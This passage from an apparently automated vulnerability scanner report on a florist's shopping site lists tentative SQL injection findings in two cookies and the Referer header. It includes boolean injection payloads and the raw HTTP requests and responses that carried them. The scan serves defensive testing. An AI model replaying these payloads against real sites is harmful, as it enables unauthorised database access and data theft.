Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000vYqYqATbr9y3gSABi7eMNL4:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE
Content-Length: 0

Response 1

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:11:16 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000zqemLI5tFS3_cCVIEMj3gm6:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29038










<html>
<head>    
<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/flowers_enterprise_apr1.css"/>

<script type="text/javascript" src="http://media1.1800flowers.com/800f_assets/jet/website/scripts/flowers/flowers_enterprise_apr9.js"></script>

       
</head>
<body >
<input type="hidden" id="prodType" name="prodType" value="FPT" />

<table class="frame" cellpadding="0" cellspacing="0">
<tr>
<td align="left" width="50%" style="padding:5px 5px 0px 5px" valign="top">
<div id="deliveryCalendar">
<h3>Select a delivery date below</h3>
<div class="calInfoTxt">Click on date below to choose the delivery date of your gift.</div>


<div class="calMonth monthAlign" id="month2">
   
   <div class="calMonthHdr"><a id="prev" tabindex="7" href="javascript:callCal('3','2011','91637L','product','10010','','FPT','deliveryDate','prev')" ><span class="calNavText"><img alt="Previous" src="http://media6.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/calarrowsleft.gif" border="0" /></span></a> April 2011 <a href="javascript:callCal('5','2011','91637L','product','10010','','FPT','deliveryDate','next');" tabindex="10"><span class="calNavText"><img alt="Next" src="http://media6.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/calarrowsright.gif" border="0"/></span></a></div>
   

   <div class="calDaysHdr"><div class="calDaysHdrtxt">sun</div> <div class="calDaysHdrtxt">mon</div> <div class="calDaysHdrtxt">tues</div> <div class="calDaysHdrtxt">wed</div> <div class="calDaysHdrtxt">thurs</div> <div class="calDaysHdrtxt">fri</div> <div class="calDaysHdrtxt">sat</div></div>
       
           <div class="calWeek">
               
               
...[SNIP]...

Request 2

POST /deliverycalendarnew.do?month=512903751%20or%201%3d2--%20&year=2011&locationType=1&itemCount=1&prodType=FPT&productPrice=59.99&zip=10010&country=&productSKU=91637L&contextPageType=PRODUCT&isGeoSell=false&field=deliveryDate&baseCode=91637&nextMonthAvailableCheck=true&page=product HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Origin: http://ww30.1800flowers.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000vYqYqATbr9y3gSABi7eMNL4:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE
Content-Length: 0

Response 2

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:11:16 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29038










<html>
<head>    
<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/flowers_enterprise_apr1.css"/>

<script type="text/javascript" src="http://media1.1800flowers.com/800f_assets/jet/website/scripts/flowers/flowers_enterprise_apr9.js"></script>

       
</head>
<body >
<input type="hidden" id="prodType" name="prodType" value="FPT" />

<table class="frame" cellpadding="0" cellspacing="0">
<tr>
<td align="left" width="50%" style="padding:5px 5px 0px 5px" valign="top">
<div id="deliveryCalendar">
<h3>Select a delivery date below</h3>
<div class="calInfoTxt">Click on date below to choose the delivery date of your gift.</div>


<div class="calMonth monthAlign" id="month2">
   
   <div class="calMonthHdr"><a id="prev" tabindex="7" href="javascript:callCal('3','2011','91637L','product','10010','','FPT','deliveryDate','prev')" ><span class="calNavText"><img alt="Previous" src="http://media6.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/calarrowsleft.gif" border="0" /></span></a> April 2011 <a href="javascript:callCal('5','2011','91637L','product','10010','','FPT','deliveryDate','next');" tabindex="10"><span class="calNavText"><img alt="Next" src="http://media6.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/calarrowsright.gif" border="0"/></span></a></div>
   

   <div class="calDaysHdr"><div class="calDaysHdrtxt">sun</div> <div class="calDaysHdrtxt">mon</div> <div class="calDaysHdrtxt">tues</div> <div class="calDaysHdrtxt">wed</div> <div class="calDaysHdrtxt">thurs</div> <div class="calDaysHdrtxt">fri</div> <div class="calDaysHdrtxt">sat</div></div>
       
           <div class="calWeek">
               
                   
                       
                       
                           <div class="calDay inactiveday" id="
...[SNIP]...

1.4. http://ww30.1800flowers.com/product.do [CMAVID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ww30.1800flowers.com
Path:   /product.do

Issue detail

The CMAVID cookie appears to be vulnerable to SQL injection attacks. The payloads 56663729'%20or%201%3d1--%20 and 56663729'%20or%201%3d2--%20 were each submitted in the CMAVID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /product.do HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Cache-Control: max-age=0
Origin: http://ww30.1800flowers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=7009130384324031606755556663729'%20or%201%3d1--%20; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; JSESSIONID=0000se4bMqEJJFjkiTeOn0WDYky:-1; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902910729&t2=1304902919731&t3=1304902952007&t4=1304902907868&lti=1304902952006&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304902952021&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A25%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20Fields%20of%20Europe%20for%20Spring%20%2891637%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784&ul=http%3A//ww30.1800flowers.com/product.do%3FbaseCode%3D91637%26dataset%3D10305%26cm_cid%3Dd10305&rf=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305
Content-Length: 770

delDateColl=&personalizable=false&submitForm=&personalComment=&personalCount=&generalProductDataset=1011&hospitalDataset=10156&funeralHomeDataset=10216&ruralRouteDataset=10156&fagfDataset=11354&datase
...[SNIP]...

Response 1

HTTP/1.1 500 Internal Server Error
Date: Mon, 09 May 2011 01:28:48 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 38787

<html>
<head>

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<meta name="robots" content="noindex,nofollow"/>


<title>Error Occurred</title>
<link rel="canonical" href="http://www.1800flowers.com/error.do" />

<link rel="shortcut icon" href="http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/runtime/favicon.ico" />



<link rel="stylesheet" type="text/css" href="http://media5.1800flowers.com/800f_assets/jet/website/styles/flowers/carousel_002.css"/>


<link rel="stylesheet" type="text/css" href="http://media3.1800flowers.com/800f_assets/jet/website/styles/flowers/account_v1.css"/>



<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/flowers_enterprise_apr1.css"/>




<style type="text/css">/* common.css */.trsHeader {background:#FFF url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x scroll 0 0 !important;} /*newcommoncss.css*/body {/* Edit - Body BG Image & Color Hex */background: url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/spr11_bkgrnd.gif) no-repeat #ceb5dd top center !important;_background-position-y: 1px; #background-position-y: 1px;}.Container {background:#FFF url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x !important;background-position:0 -1px !important;} /* Top nav style*/.bluetabs li a {color:#FFF !important; font-weight:bold;padding-left:30px !important;padding-right:30px !important;} /* Last Nav Tab paddding*/ .bluetabs li a.tabnormal8 {padding-right:15px !important;} .bluetabs {/* Edit NAV BG Img & color */background: url(http://media1.1800flowers.com/800f_asset
...[SNIP]...

Request 2

POST /product.do HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Cache-Control: max-age=0
Origin: http://ww30.1800flowers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=7009130384324031606755556663729'%20or%201%3d2--%20; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; JSESSIONID=0000se4bMqEJJFjkiTeOn0WDYky:-1; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902910729&t2=1304902919731&t3=1304902952007&t4=1304902907868&lti=1304902952006&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304902952021&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A25%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20Fields%20of%20Europe%20for%20Spring%20%2891637%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784&ul=http%3A//ww30.1800flowers.com/product.do%3FbaseCode%3D91637%26dataset%3D10305%26cm_cid%3Dd10305&rf=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305
Content-Length: 770

delDateColl=&personalizable=false&submitForm=&personalComment=&personalCount=&generalProductDataset=1011&hospitalDataset=10156&funeralHomeDataset=10216&ruralRouteDataset=10156&fagfDataset=11354&datase
...[SNIP]...

Response 2

HTTP/1.1 500 Internal Server Error
Date: Mon, 09 May 2011 01:28:49 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Set-Cookie: JSESSIONID=0000OxINk2rPNAnwU2DMQGwt1bU:-1; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 38787

<html>
<head>

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<meta name="robots" content="noindex,nofollow"/>


<title>Error Occurred</title>
<link rel="canonical" href="http://www.1800flowers.com/error.do" />

<link rel="shortcut icon" href="http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/runtime/favicon.ico" />



<link rel="stylesheet" type="text/css" href="http://media5.1800flowers.com/800f_assets/jet/website/styles/flowers/carousel_002.css"/>


<link rel="stylesheet" type="text/css" href="http://media3.1800flowers.com/800f_assets/jet/website/styles/flowers/account_v1.css"/>



<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/flowers_enterprise_apr1.css"/>




<style type="text/css">/* common.css */.trsHeader {background:#FFF url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x scroll 0 0 !important;} /*newcommoncss.css*/body {/* Edit - Body BG Image & Color Hex */background: url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/spr11_bkgrnd.gif) no-repeat #ceb5dd top center !important;_background-position-y: 1px; #background-position-y: 1px;}.Container {background:#FFF url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x !important;background-position:0 -1px !important;} /* Top nav style*/.bluetabs li a {color:#FFF !important; font-weight:bold;padding-left:30px !important;padding-right:30px !important;} /* Last Nav Tab paddding*/ .
...[SNIP]...

1.5. http://ww30.1800flowers.com/shoppingbasket.do [brandCode cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ww30.1800flowers.com
Path:   /shoppingbasket.do

Issue detail

The brandCode cookie appears to be vulnerable to SQL injection attacks. The payloads 11283013'%20or%201%3d1--%20 and 11283013'%20or%201%3d2--%20 were each submitted in the brandCode cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /shoppingbasket.do HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=100111283013'%20or%201%3d1--%20; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902910729&t2=1304902919731&t3=1304902952007&t4=1304902907868&lti=1304902952006&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304902952021&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A25%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20Fields%20of%20Europe%20for%20Spring%20%2891637%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784&ul=http%3A//ww30.1800flowers.com/product.do%3FbaseCode%3D91637%26dataset%3D10305%26cm_cid%3Dd10305&rf=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1

Response 1

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:15:40 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000Wj3sXdlqqkt2mok1wAhSlIN:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 150888

<html>
<head>

   <meta http-equiv="Pragma" content="no-cache">
   <meta http-equiv="Cache-Control" content="no-cache">
   <meta http-equiv="Expires" content="1">

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">

   <meta name="robots" content="noindex,nofollow"/>


<!-- shopping basket head --><style type="text/css">#fagf {background:url('/800f_assets/jet/website/images/flowers/banners/fagf_holiday10_shoppingbg.jpg') no-repeat !important; width:212px !important; padding-left: 20px !important; padding-top: 84px !important;}.FindGiftLabel {color:#fff !important} .n-chkPaypal {margin-left:490px !important;}.n-chkCartRR {display:none;}</style>
<title>Shopping Basket - 1-800-FLOWERS.COM</title>
<link rel="canonical" href="http://ww30.1800flowers.com/shoppingbasket.do" />

<link rel="shortcut icon" href="http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/runtime/favicon.ico" />


<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/flowers_enterprise_apr1.css"/>
<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/redesign/jquery-ui-1.7.2.custom_chk1.css"/>


<style type="text/css">/* common.css */.trsHeader {background:#FFF url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x scroll 0 0 !important;} /*newcommoncss.css*/body {/* Edit - Body BG Image & Color Hex */background: url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/spr11_bkgrnd.gif) no-repeat #ceb5dd top center !important;_background-position-y: 1px; #background-
...[SNIP]...

Request 2

GET /shoppingbasket.do HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=100111283013'%20or%201%3d2--%20; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902910729&t2=1304902919731&t3=1304902952007&t4=1304902907868&lti=1304902952006&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304902952021&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A25%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20Fields%20of%20Europe%20for%20Spring%20%2891637%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784&ul=http%3A//ww30.1800flowers.com/product.do%3FbaseCode%3D91637%26dataset%3D10305%26cm_cid%3Dd10305&rf=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1

Response 2

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:15:44 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 150888

<html>
<head>

   <meta http-equiv="Pragma" content="no-cache">
   <meta http-equiv="Cache-Control" content="no-cache">
   <meta http-equiv="Expires" content="1">

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">

   <meta name="robots" content="noindex,nofollow"/>


<!-- shopping basket head --><style type="text/css">#fagf {background:url('/800f_assets/jet/website/images/flowers/banners/fagf_holiday10_shoppingbg.jpg') no-repeat !important; width:212px !important; padding-left: 20px !important; padding-top: 84px !important;}.FindGiftLabel {color:#fff !important} .n-chkPaypal {margin-left:490px !important;}.n-chkCartRR {display:none;}</style>
<title>Shopping Basket - 1-800-FLOWERS.COM</title>
<link rel="canonical" href="http://ww30.1800flowers.com/shoppingbasket.do" />

<link rel="shortcut icon" href="http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/runtime/favicon.ico" />


<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/flowers_enterprise_apr1.css"/>
<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/redesign/jquery-ui-1.7.2.custom_chk1.css"/>


<style type="text/css">/* common.css */.trsHeader {background:#FFF url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x scroll 0 0 !important;} /*newcommoncss.css*/body {/* Edit - Body BG Image & Color Hex */background: url(http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/spr11_bkgrnd.gif) no-repeat #ceb5dd top center !important;_background-position-y: 1px; #background-position-y: 1px;}.Container {background:#FFF url(http://media1.
...[SNIP]...

1.6. https://ww30.1800flowers.com/checkoutsignin.do [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://ww30.1800flowers.com
Path:   /checkoutsignin.do

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /checkoutsignin.do HTTP/1.1
Host: ww30.1800flowers.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d1--%20
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.5.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|5|0|0|0|1|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902956353&t2=1304902961198&t3=1304902969048&t4=1304902955083&lti=1304902969048&ln=&hr=javascript%3AsetEvent%28shipping%2CshoppingBasketForm%29&fti=1304902969061&fn=searchform%3A0%3BshoppingBasketForm%3A1%3BUNDEFINED%3A2%3B&ac=1:S&fd=&uer=&fu=/shoppingbasket.do&pi=o-Checkout%20-%20Shopping%20Basket%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response 1

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:16:30 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000Ln0FjPqsWC1vFgUWBlg4otv:-1; Path=/
Set-Cookie: 18FBannerCode=seogoogle; Expires=Wed, 11-May-11 01:16:30 GMT; Path=/; Domain=1800flowers.com
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 19826

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<meta name="robots" content="noindex,nofollow"/>


<title>Sign In - 1-800-FLOWERS.COM</title>
<link rel="canonical" href="http://www.1800flowers.com/checkoutsignin.do" />

<link rel="shortcut icon" href="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/images/flowers/runtime/favicon.ico" />


<link rel="stylesheet" type="text/css" href="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/styles/flowers/flowers_enterprise_apr1.css"/>

<link rel="stylesheet" type="text/css" href="https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/styles/flowers/n-checkout_oct.css"/>

<style type="text/css">/* common.css */.trsHeader {background:#FFF url(https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repeat-x scroll 0 0 !important;} /*newcommoncss.css*/body {/* Edit - Body BG Image & Color Hex */background: url(https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/images/flowers/spr11_bkgrnd.gif) no-repeat #ceb5dd top center !important;_background-position-y: 1px; #background-position-y: 1px;}.Container {background:#FFF url(https://a248.e.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/images/flowers/brandable/back2.gif) repea
...[SNIP]...

